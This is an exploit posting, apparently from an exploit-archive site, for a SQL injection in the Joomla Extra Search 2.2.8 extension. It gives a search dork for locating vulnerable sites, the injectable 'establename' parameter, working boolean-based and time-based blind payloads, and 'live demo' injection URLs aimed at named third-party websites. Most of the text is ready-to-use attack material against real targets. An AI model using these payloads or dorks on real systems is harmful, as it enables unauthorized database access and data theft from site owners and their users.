Home / os / winmobile

Joomla Extra Search 2.2.8 SQL Injection

Posted on 02 August 2016

###################### # Exploit Title : Joomla com_extrasearch SQL injection Vulnerability # Exploit Author : howucan # Website : http://howucan.gr # Dork : inurl:/index.php?option=com_extrasearch establename # Software link : http://www.joomlaboat.com/extra-search # Software version : 2.2.8 # video : http://adf.ly/1cmGen # Tested on: [ Parrot os 3.1 ] # Date: 2016/07/31 # ###################### # [+] Poc : ###################### # Get Parameter establename Vulnerable To SQLi # http(s)://<host>/<joomla-path>/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes(inject here) # [+] SQLmap Poc : ############### # Type: boolean-based blind # Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) # Payload: option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=-5792" OR MAKE_SET(5730=5730,3268) AND "OpLU"="OpLU # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes" AND SLEEP(5) AND "bmqB"="bmqB # ###################### # [+] Live Demo # http://www.joomlaboat.com/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes%27 # http://cursosoxford.com/index.php/en/?option=com_extrasearch&view=details&listing_id=6&Itemid=178&establename=calendar%27&returnto=aHR0cDovL2N1cnNvc294Zm9yZC5jb20vaW5kZXgucGhwL2VuLyNhNg== # http://tuesmeralda.com/en/?option=com_extrasearch&view=details&listing_id=37&Itemid=106&establename=catalog%27&returnto=aHR0cDovL3R1ZXNtZXJhbGRhLmNvbS9lcy9jb2xlY2Npb24tcGxhdGEtZXNtZXJhbGRhI2EzNw== ###################### # Salonika Punk Rock City # PAOK G4 #######################

 

TOP